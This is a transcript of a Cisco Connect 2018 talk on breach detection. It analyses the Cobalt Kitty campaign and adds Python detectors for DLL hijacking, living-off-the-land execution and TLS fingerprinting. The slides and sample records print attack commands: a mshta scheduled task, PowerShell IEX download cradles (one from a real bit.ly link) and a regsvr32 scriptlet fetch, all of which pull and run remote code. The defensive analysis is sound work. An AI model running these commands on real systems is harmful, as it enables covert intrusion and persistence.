Breach Detection and Mitigation - Cisco
TRANSCRIPT
Breach Detection and Mitigation: Practical Examples
Dragan Novakovic, Consulting Systems Engineer
19 - 21 March 2018 | Cisco Connect | Rovinj, Croatia
Challenges Today
• Many discrete security products
• Information overload
• High cost of attacker attribution
• Inefficient breach mitigation process
Advanced Adversary
• A step below government-sponsored attackers, but much more widespread
• Individuals or organized groups, not governments
• Going after a smaller number of targets, but higher profit per target
• Capable of steering infections individually
• Going after $$: intellectual property, access and user data

Advanced Attack Commonalities
• Sandboxing and analysis evasion
• Misuse of legitimate resources
• Low forensic footprint
• Layers of scripting
• Steganography
• Stable C&C
From The Trenches: Cobalt Kitty Campaign
§ Well documented campaign
§ Reveals the latest attack techniques and tactics
§ Resulted in the compromise of a domain admin account and a severe data breach
Source: https://www2.cybereason.com/asset/60:research-cobalt-kitty-attack-lifecycle
Kill chain: Delivery → Exploitation → Installation → Persistence → Lateral Movement → Exfiltration
From The Trenches: Cobalt Kitty Campaign - Delivery
§ Spear-phishing: email containing links to a fake Flash update
– Users are likely to grant admin rights
– Downloads and executes Cobalt Strike Beacon (post-exploitation tool)
§ Microsoft Office Word document with macros
– Macro creates simple scheduled tasks using cmd.exe
– Windows AppLocker script-blocking policy bypass using regsvr32.exe (Metasploit: exploit/windows/misc/regsvr32_applocker_bypass_server)
– Runs PowerShell through rundll32 to bypass software restriction policies (https://github.com/p3nt4/PowerShdll)
From The Trenches: Cobalt Kitty Campaign - Exploitation
Scheduled task creation: the task runs mshta.exe (Microsoft HTML Application host) every 15 minutes with an inline VBScript that pulls its real body from a remote "image" file:

    schtasks /create /sc MINUTE /tn "Windows Error Reporting" /tr "mshta.exe about:'<script language=\"vbscript\" src=\"http:xxx/microsoftp.jpg\">code close</script>'" /mo 15 /F

The VBScript runs a cmd command that starts PowerShell, which downloads and executes the Cobalt Strike Beacon stage in memory (PowerShell script execution via Invoke-Expression, nothing written to disk):

    Set objShell = CreateObject("Wscript.Shell")
    intReturn = objShell.Run("powershell -exec bypass -com ""IEX ((new-object net.webclient).downloadstring('hxxp://xx/image.jpg'))""")
From The Trenches: Cobalt Kitty Campaign - Persistence
Persistence mechanisms
– Windows Scheduled Tasks
– Windows Services
– Windows Registry autorun keys
DLL hijacking
– Uses legitimate software to execute a trojanized DLL
– Abuses either a DLL that is not present by default, or the search order in which the DLL is loaded
– Examples: Windows Search loading msfte.dll; Google Update loading goopdate.dll
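Both hijack variants on this slide can be caught from image-load telemetry. The block below is an added example (not code from the talk or from any Cisco product) that walks Sysmon-Event-ID-7-style records and flags a phantom DLL load (a name the host probes for but that does not exist on a default install, as with msfte.dll), a system DLL name resolved outside the Windows system directories, and unsigned code loaded from a user-writable path by a signed host. The records, field names, watchlists and paths are constructed assumptions for illustration; the goopdate.dll case is modelled as a planted copy found earlier in the search order.

```python
"""Detect the DLL-hijacking patterns from the Cobalt Kitty persistence slide
in image-load telemetry. Added example, not from the original talk.
The events below are constructed Sysmon-Event-ID-7-style records; the field
names (image, image_loaded, signed, process_signed), the paths and the two
watchlists are assumptions for illustration."""
from dataclasses import dataclass

# DLL names that the named host process probes for but that are not shipped
# by default, so any successful load is suspicious (assumption).
PHANTOM_DLLS = {"msfte.dll": "searchindexer.exe"}

# Well-known search-order hijack targets that should only ever resolve from
# the Windows system directories (assumption; extend from your own baseline).
SYSTEM_DLLS = {"version.dll", "cryptsp.dll", "wlbsctrl.dll", "dwmapi.dll", "uxtheme.dll"}

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
WRITABLE_HINTS = ("\\appdata\\", "\\temp\\", "c:\\programdata\\", "c:\\users\\")


@dataclass(frozen=True)
class Finding:
    process: str
    loaded: str
    reason: str


def _norm(path: str) -> str:
    return path.replace("/", "\\").lower()


def check_image_loads(events):
    """Return one Finding per (event, rule) hit; benign loads yield nothing."""
    findings = []
    for ev in events:
        proc = _norm(ev["image"]).rsplit("\\", 1)[-1]
        loaded = _norm(ev["image_loaded"])
        name = loaded.rsplit("\\", 1)[-1]
        directory = loaded.rsplit("\\", 1)[0] + "\\"

        # 1. Phantom DLL: the host is known to look for it and it should not exist at all.
        if PHANTOM_DLLS.get(name) == proc:
            findings.append(Finding(proc, ev["image_loaded"],
                                    "phantom DLL loaded (absent on a default install)"))
        # 2. Search-order hijack: a system DLL name resolved outside System32/SysWOW64.
        if name in SYSTEM_DLLS and not directory.startswith(SYSTEM_DIRS):
            findings.append(Finding(proc, ev["image_loaded"],
                                    "system DLL name loaded outside the system directories"))
        # 3. Unsigned module from a user-writable location inside a signed host process.
        if not ev.get("signed", False) and ev.get("process_signed", False) \
                and any(h in directory for h in WRITABLE_HINTS):
            findings.append(Finding(proc, ev["image_loaded"],
                                    "unsigned DLL from user-writable path in signed process"))
    return findings


# Constructed sample records: three hijacks followed by two benign loads.
EVENTS = [
    {"image": r"C:\Windows\System32\SearchIndexer.exe", "process_signed": True,
     "image_loaded": r"C:\Windows\System32\msfte.dll", "signed": False},
    {"image": r"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe", "process_signed": True,
     "image_loaded": r"C:\ProgramData\Google\goopdate.dll", "signed": False},
    {"image": r"C:\Windows\System32\notepad.exe", "process_signed": True,
     "image_loaded": r"C:\Users\student1\Desktop\version.dll", "signed": False},
    {"image": r"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe", "process_signed": True,
     "image_loaded": r"C:\Program Files (x86)\Google\Update\1.0.0.0\goopdate.dll", "signed": True},
    {"image": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "process_signed": True,
     "image_loaded": r"C:\Windows\System32\version.dll", "signed": True},
]

if __name__ == "__main__":
    for f in check_image_loads(EVENTS):
        print(f"{f.process}: {f.loaded} -> {f.reason}")
```

Rule 3 is the one that generalizes beyond the two named DLLs: a signed host loading an unsigned module from a path the user can write to is the common denominator of most search-order hijacks, and it costs nothing to baseline per host.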
From The Trenches: Cobalt Kitty Campaign - Lateral Movement
File-less credential and hash stealing
– Modified version of Mimikatz (file-less)
– Modified version of a password file dumper
Lateral movement
– Pass-the-hash and pass-the-ticket attacks
– Use of Windows Management Instrumentation (WMI) for remote execution
From The Trenches: Cobalt Kitty Campaign - Lateral Movement: File-less Scanning Using PowerUp
– Scanning for open ports, vulnerable services and OS fingerprinting using externally hosted PowerShell scripts loaded straight into memory (file-less download through Invoke-Expression). The command below loads PowerUp and runs Invoke-AllChecks, which enumerates local privilege-escalation opportunities such as misconfigured services:

    powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/1mK64oH'); Invoke-AllChecks"

References: https://blogs.technet.microsoft.com/heyscriptingguy/2014/03/19/creating-a-port-scanner-with-windows-powershell/ and https://www.harmj0y.net/blog/powershell/powerup-a-usage-guide/
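The execution chain from the Exploitation slide (macro → cmd.exe → schtasks → mshta → PowerShell download cradle, plus the regsvr32 and rundll32/PowerShdll bypasses) and the PowerUp cradle above all leave the same footprint in process-creation telemetry. The block below is an added example (not code from the talk or from any Cisco product) that runs a small rule set over constructed Sysmon-Event-ID-1-style records and tags each hit with the kill-chain stage the talk uses. The record field names, the sample command lines (which follow the shapes shown on the slides, with placeholder URLs) and the benign control records are assumptions for illustration.

```python
"""Flag the living-off-the-land execution chain from the Cobalt Kitty slides in
process-creation telemetry. Added example, not from the original talk.
Records are constructed Sysmon-Event-ID-1-style dictionaries; field names
(image, parent_image, command_line) and sample values are assumptions."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    rule: str
    stage: str
    image: str
    command_line: str


LOLBINS = ("mshta", "powershell", "regsvr32", "rundll32", "wscript", "cscript", "certutil", "bitsadmin")
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "mshta.exe", "wscript.exe", "cscript.exe",
          "regsvr32.exe", "rundll32.exe"}

# "IEX (New-Object Net.WebClient).DownloadString(" in its usual spellings,
# including the extra parentheses seen in the VBScript stage on the slides.
CRADLE = re.compile(
    r"(?:iex|invoke-expression)\s*\(+\s*new-object\s+(?:system\.)?net\.webclient\)\.downloadstring",
    re.IGNORECASE)
INLINE_HTA = re.compile(r"(?:about|javascript|vbscript):")


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events):
    """Apply each rule to every record; a record may match more than one rule."""
    findings = []
    for ev in events:
        img = basename(ev["image"])
        parent = basename(ev.get("parent_image", ""))
        cmd = ev["command_line"]
        low = cmd.lower()

        def hit(rule, stage):
            findings.append(Finding(rule, stage, img, cmd))

        if parent in OFFICE and img in SHELLS:                       # macro spawning a shell
            hit("office_spawns_shell", "Exploitation")
        if img == "schtasks.exe" and "/create" in low and "/tr" in low \
                and any(b in low for b in LOLBINS):                  # task whose action is a LOLBin
            hit("schtasks_runs_lolbin", "Persistence")
        if img == "mshta.exe" and INLINE_HTA.search(low):            # inline script, no .hta file
            hit("mshta_inline_script", "Exploitation")
        if img == "powershell.exe" and CRADLE.search(cmd):           # in-memory download cradle
            stage = "Lateral Movement" if "invoke-allchecks" in low else "Exploitation"
            hit("powershell_download_cradle", stage)
        if img == "regsvr32.exe" and "scrobj.dll" in low and re.search(r"/i:\s*https?:", low):
            hit("regsvr32_scrobj_bypass", "Exploitation")            # AppLocker bypass via scriptlet
        if img == "rundll32.exe" and "powershdll" in low:
            hit("rundll32_powershdll", "Exploitation")               # PowerShell without powershell.exe
    return findings


# Constructed sample records (placeholder URLs); the last two are benign controls.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    {"image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "command_line": "cmd.exe /c schtasks /create /sc MINUTE /tn \"Windows Error Reporting\" "
                     "/tr \"mshta.exe about:'<script language=vbscript src=http://xxx/microsoftp.jpg>"
                     "code close</script>'\" /mo 15 /F"},
    {"image": r"C:\Windows\System32\schtasks.exe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": "schtasks /create /sc MINUTE /tn \"Windows Error Reporting\" /tr \"mshta.exe "
                     "about:'<script language=vbscript src=http://xxx/microsoftp.jpg>code close"
                     "</script>'\" /mo 15 /F"},
    {"image": r"C:\Windows\System32\mshta.exe", "parent_image": r"C:\Windows\System32\svchost.exe",
     "command_line": "mshta.exe about:'<script language=vbscript src=http://xxx/microsoftp.jpg>"
                     "code close</script>'"},
    {"image": PS, "parent_image": r"C:\Windows\System32\mshta.exe",
     "command_line": "powershell -exec bypass -com \"IEX ((new-object net.webclient)"
                     ".downloadstring('http://xx/image.jpg'))\""},
    {"image": PS, "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": "Powershell -nop -exec bypass -c \"IEX (New-Object Net.WebClient)"
                     ".DownloadString('http://bit.ly/1mK64oH'); Invoke-AllChecks\""},
    {"image": r"C:\Windows\System32\regsvr32.exe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": "regsvr32 /s /n /u /i:http://xxx/file.sct scrobj.dll"},
    {"image": r"C:\Windows\System32\rundll32.exe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": "rundll32 PowerShdll.dll,main -w"},
    {"image": PS, "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"powershell.exe -File C:\Scripts\inventory.ps1"},
    {"image": r"C:\Windows\System32\schtasks.exe", "parent_image": r"C:\Windows\System32\svchost.exe",
     "command_line": r'schtasks /create /sc DAILY /tn "Backup" /tr "C:\Program Files\Backup\backup.exe"'},
]

if __name__ == "__main__":
    for f in detect(EVENTS):
        print(f"[{f.stage}] {f.rule}: {f.image} :: {f.command_line[:70]}")
```

The rules deliberately key on parent/child relationships and on the download cradle rather than on the URL or task name, which the attacker changes for free; the PowerUp record is stage-tagged as lateral movement only because Invoke-AllChecks is the reconnaissance step that precedes it in this campaign.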
From The Trenches: Cobalt Kitty Campaign - Exfiltration
– C&C and exfiltration using NetCat, DNS tunneling and Cobalt Strike Malleable C2
– Outlook scripts to send exfiltrated data to a Gmail address
"The art of war teaches us to rely not on the likelihood of the enemy's not coming, but on our own readiness to receive him."
Sun Tzu, The Art of War
(Image: http://maxpixel.freegreatpicture.com/Museum-Statue-Xian-Old-China-Warriors-1445587)
1. Hinder In-Advance Attack Preparation
✓ Cognitive Threat Analytics
– Internal state
– Passive
– No feeds
✓ StealthWatch
– Passive
– Lateral movement
– Baselining
2. Deploy Generic C&C Detectors
✓ Umbrella Investigate
– Predictive algorithms
– Automatic takedown
– Co-occurrences
✓ Cognitive Threat Analytics
– Uncovers the entire infrastructure
– Behavior and context
– Including low & slow and steganography-based channels
✓ Encrypted Traffic Analytics (Stealthwatch)
Detects malicious traffic without decrypting the session, by analyzing:
– Initial data packet
– Hostname
– Certificate information
– Supported cipher suites
– Packet size/timing in TLS-based connections
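The first three features on that list all come from the initial data packet of the TLS session, the ClientHello. The block below is an added example (not code from the talk or from Cisco's product) of extracting them: a minimal ClientHello parser that pulls out the SNI hostname, the offered cipher suites, the extension list and the elliptic-curve parameters, and folds them into a JA3-style fingerprint string, which is the same kind of client fingerprint a detector keys on before a byte of payload is seen. The two ClientHello records are assembled inline (constructed samples, not captured traffic); the hostname, cipher lists and the `flag_client_hello` heuristics are assumptions for illustration.

```python
"""Extract initial-data-packet features from a TLS ClientHello and build a
JA3-style fingerprint. Added example, not from the original talk.
The sample records are constructed with build_client_hello(); hostnames,
cipher lists and the heuristics in flag_client_hello() are assumptions."""
import hashlib
import struct

# GREASE values (RFC 8701) are random per connection and must be dropped
# before fingerprinting, otherwise the same client yields different hashes.
GREASE = {0x0a0a + 0x1010 * i for i in range(16)}

WEAK_CIPHERS = {0x0001: "NULL-MD5", 0x0002: "NULL-SHA", 0x0004: "RC4-MD5",
                0x0005: "RC4-SHA", 0x000A: "3DES-CBC-SHA"}


def _u16(b: bytes, off: int) -> int:
    return struct.unpack_from("!H", b, off)[0]


def parse_client_hello(record: bytes) -> dict:
    """Parse one TLS record carrying a ClientHello; raises ValueError otherwise."""
    if len(record) < 5 or record[0] != 0x16:
        raise ValueError("not a TLS handshake record")
    body = record[5:5 + _u16(record, 3)]
    if not body or body[0] != 0x01:
        raise ValueError("not a ClientHello")
    hello = body[4:4 + int.from_bytes(body[1:4], "big")]
    version = _u16(hello, 0)
    off = 2 + 32                                   # legacy_version + random
    off += 1 + hello[off]                          # session id
    cs_len = _u16(hello, off); off += 2
    ciphers = [_u16(hello, off + i) for i in range(0, cs_len, 2)]; off += cs_len
    off += 1 + hello[off]                          # compression methods
    ext_types, groups, formats, sni = [], [], [], None
    if off < len(hello):                           # extensions block is optional
        end = off + 2 + _u16(hello, off); off += 2
        while off < end:
            etype, elen = _u16(hello, off), _u16(hello, off + 2)
            data = hello[off + 4:off + 4 + elen]; off += 4 + elen
            ext_types.append(etype)
            if etype == 0x0000:                    # server_name: list_len, type, name_len, name
                sni = data[5:5 + _u16(data, 3)].decode("ascii", "replace")
            elif etype == 0x000a:                  # supported_groups
                groups = [_u16(data, 2 + i) for i in range(0, _u16(data, 0), 2)]
            elif etype == 0x000b:                  # ec_point_formats
                formats = list(data[1:1 + data[0]])
    keep = lambda vals: [v for v in vals if v not in GREASE]
    ja3 = ",".join([str(version), "-".join(map(str, keep(ciphers))),
                    "-".join(map(str, keep(ext_types))), "-".join(map(str, keep(groups))),
                    "-".join(map(str, formats))])
    return {"version": version, "sni": sni, "ciphers": keep(ciphers),
            "extensions": keep(ext_types), "ja3": ja3,
            "ja3_md5": hashlib.md5(ja3.encode()).hexdigest()}


def flag_client_hello(features: dict) -> list:
    """Illustrative heuristics (assumptions) over the parsed features."""
    reasons = []
    if not features["sni"]:
        reasons.append("no SNI: hostname cannot be checked against reputation data")
    weak = [WEAK_CIPHERS[c] for c in features["ciphers"] if c in WEAK_CIPHERS]
    if weak:
        reasons.append("offers weak cipher suites: " + ", ".join(weak))
    if len(features["ciphers"]) <= 2:
        reasons.append("very short cipher list, typical of scripted or hand-rolled TLS clients")
    return reasons


def build_client_hello(ciphers, sni=None, groups=(0x0017,)) -> bytes:
    """Assemble a TLS 1.2 ClientHello record (constructed sample, not captured traffic)."""
    ext = lambda etype, data: struct.pack("!HH", etype, len(data)) + data
    exts = b""
    if sni is not None:
        name = sni.encode()
        exts += ext(0x0000, struct.pack("!HBH", len(name) + 3, 0, len(name)) + name)
    exts += ext(0x000a, struct.pack("!H", 2 * len(groups)) + b"".join(struct.pack("!H", g) for g in groups))
    exts += ext(0x000b, b"\x01\x00")               # ec_point_formats: uncompressed
    exts += ext(0x000d, b"\x00\x02\x04\x03")       # signature_algorithms: ecdsa_secp256r1_sha256
    cs = b"".join(struct.pack("!H", c) for c in ciphers)
    hello = (b"\x03\x03" + b"\x11" * 32 + b"\x00" + struct.pack("!H", len(cs)) + cs
             + b"\x01\x00" + struct.pack("!H", len(exts)) + exts)
    handshake = b"\x01" + len(hello).to_bytes(3, "big") + hello
    return b"\x16\x03\x01" + struct.pack("!H", len(handshake)) + handshake


# Constructed samples: a browser-like hello (with a GREASE cipher) and a tool-like one.
BROWSER_LIKE = build_client_hello([0xC02B, 0xC02F, 0x009C, 0x0A0A], sni="www.example.com")
TOOL_LIKE = build_client_hello([0x000A])

if __name__ == "__main__":
    for sample in (BROWSER_LIKE, TOOL_LIKE):
        f = parse_client_hello(sample)
        print(f["sni"], f["ja3"], f["ja3_md5"], flag_client_hello(f))
```

Packet size and timing, the remaining two features on the slide, need the whole flow rather than one record, so they are out of scope here; the fingerprint above is what lets a detector say "this is not the browser it claims to be" from the very first packet.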
3. Stream Endpoint and Network Level Traces
Because:
• Coding errors happen
• Mistakes happen
• Detections that only arrive with a definition update happen
Do:
§ Collect and have at hand endpoint and network activity logs
✓ AMP for Endpoints
– Collects traces
– Retrospection
– Root cause analysis
– Exploit prevention
– Heuristic detection
✓ StealthWatch
– NetFlow for security
✓ Threat Grid
– Global database
– Indicators of compromise
– Pivoting and context
4. Use Vendor with Large Threat Research Team
✓ TALOS
Threat intel
– 250+ full-time threat intel researchers
– Millions of telemetry agents
– 1100+ threat traps
– 100+ threat intelligence partners
– 1.5 million daily malware samples
– 600 billion daily email messages
– 16 billion daily web requests
– 20 billion threats blocked
– Sources: honeypots, open source communities, vulnerability discovery (internal), product telemetry, internet-wide scanning
Intel sharing
– Customer data sharing programs
– Service provider coordination program
– Open source intel sharing
– 3rd party programs (MAPP)
– Industry sharing partnerships (ISACs)
– 500+ participants
5. Deploy Full Detector Stack
More detectors are needed for more complex malware, but bugs, cost and risk increase with every layer added:
– FW/NGFW
– NGIPS
– Antivirus
– Reputation/Rules
– Policy/Patches
– Content Filtering
– Sandboxing
– Anomaly
– Machine Learning

Everything is Configured… Now what?
Breach Detection and Mitigation - Practically!
Breach Detection
– Detecting a breach
– Establishing priority rating
Immediate Reaction
– Following traces from C&C to a file
– Estimating spread on the endpoint and in the network
– Reviewing related network activity
Final Reaction
– Finding additional malicious activity on the endpoint
– Analyzing the root cause
– Reimaging the affected endpoints
– Updating policies to prevent reinfection
Breach Detection and Mitigation Process
• CTA detects the C2 channel (or Umbrella, Investigate, an IoC or Talos does)
• TG provides global and local file behavior context (endpoint-level details)
• AMP identifies the files responsible for the C&C activity and provides endpoint visibility
• AMP quarantines malicious executables and blocks their reintroduction
• ISE quarantines the endpoint
• AMP is used for root cause analysis before the endpoint is reimaged
All steps need to be done within hours to prevent data leaks!
Notification About a Breach
– Daily reports in CTA
– Weekly reports in AMP
Too slow!

Notification About a Breach - Better!
§ Subscribe to email alerts
§ Use a SIEM for more granular control
Establishing Priority Rating
AMP and Threat Grid threat prioritization

Establishing Priority Rating
CTA threat prioritization
– Low risk: network-only evidence; try to clean; if that fails, monitor
– Medium risk: light infection; try to clean; if that fails, reimage
– High risk: bad infection; reimage
– Critical risk: data damage; quarantine, then reimage

Demo: AMP Event Correlation
Step 1: Breach Detection
Demo: Breach Detection

Step 2: Immediate Reaction
Demo: Immediate Reaction
Automatic response with ISE
CTA incident (raised from HTTP(S) logs) → STIX/TAXII → ISE → device quarantine
Block Everywhere - AMP Unity
– AMP Cloud: device trajectory, whitelists, blacklists, customer-specific lists
– Network appliances: NGIPS, NGFW
– Endpoints
– Content appliances: WSA (web), ESA (email)

Step 3: Final Reaction
Demo: Final Reaction
Complex Malware Revealed
– PowerShell privilege escalation
– Browser extension installation
– Stealing browser credentials
– Malware injection path
Would be prevented by ISE quarantine

Browser Exfiltration Module Revealed
C:/Users/Student1/AppData/Roaming/Mozilla/Firefox/Profiles/…/chrome/content/overlay.js

Technologies Used
• AMP for Endpoints
• Cognitive Threat Analytics
• Threat Grid
• StealthWatch
• AMP Visibility
• ISE